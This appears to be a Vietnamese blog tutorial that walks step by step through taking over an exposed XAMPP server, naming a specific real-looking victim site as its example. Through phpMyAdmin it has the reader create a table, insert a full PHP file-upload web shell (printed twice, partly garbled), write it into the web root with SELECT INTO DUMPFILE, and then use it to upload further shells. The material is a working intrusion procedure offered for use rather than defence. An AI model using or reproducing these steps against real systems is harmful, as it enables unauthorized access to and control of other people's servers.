Bước 1: Tìm Path của document root
+ Vào link http://www.victim.com/xampp/
Ví dụ: http://www.ehtpe.co.cu/xampp/
+ Vào Php infor() để xem path document root : C:/xampp/htdocs
Bước 2: Loggin và cơ sở dữ liệu:
+) http://www.ehtpe.co.cu/phpmyadmin
Bước 3: Tạo Database mới
Ví dụ: VHB_Group.
Sử dụng query:
CREATE DATABASE VHB_Group;
Hoặc như hình minh họa dưới:
Bước 4: Tạo table mới
+) Trong database VHB_Group vừa tạo, tạo table mới, đặt tên là soleil, sử dụng query sau:
CREATE TABLE soleil (contentshell varchar(10000) not null)
Bước 5: Chèn code shell
+) Chèn code shell upload vào table Soleil vừa được tạo, sử dụng query sau:
Quote
INSERT INTO soleil VALUES ('<?php
if ($HTTP_POST_VARS[\'submit\'])
{
if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\']))
{
$error = "You did not upload a file!";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//A file was uploaded
$maxfilesize=300000;
if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize)
{
$error = "File is too large.";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//File has passed all validation, copy it to the final destination and remove the temporary file:
copy($HTTP_POST_FILES[\'file\'][\'tmp_name\'],$HTTP_POST_FILES[\'file\'][\'name\']);
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
print "File has been successfully uploaded!";
exit;
}
}
}
?>
<html>
<head></head>
<body>
<form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">
<br><br>
Choose a file to upload:<br>
<input type="file" name="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>');
if ($HTTP_POST_VARS[\'submit\'])
{
if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\']))
{
$error = "You did not upload a file!";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//A file was uploaded
$maxfilesize=300000;
if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize)
{
$error = "File is too large.";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//File has passed all validation, copy it to the final destination and remove the temporary file:
copy($HTTP_POST_FILES[\'file\'][\'tmp_name\'],$HTTP_POST_FILES[\'file\'][\'name\']);
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
print "File has been successfully uploaded!";
exit;
}
}
}
?>
<html>
<head></head>
<body>
<form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">
<br><br>
Choose a file to upload:<br>
<input type="file" name="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>');
Bước 6: Export file php
Sử dụng querry:
SELECT * INTO DUMPFILE 'path/upload.php' from table_name;
Path: là path của document root.
Ví dụ:
SELECT * INTO DUMPFILE ' C:/xampp/htdocs /upload.php' from soleil;
Bước 7: Chạy Shell
Run shell theo đường link: http://domain/upload.php
Ví dụ: http://www.ehtpe.co.cu/upload.php
Sử dụng shell upload.php chúng ta có thể upload bất kỳ shell nào:
0 nhận xét:
Đăng nhận xét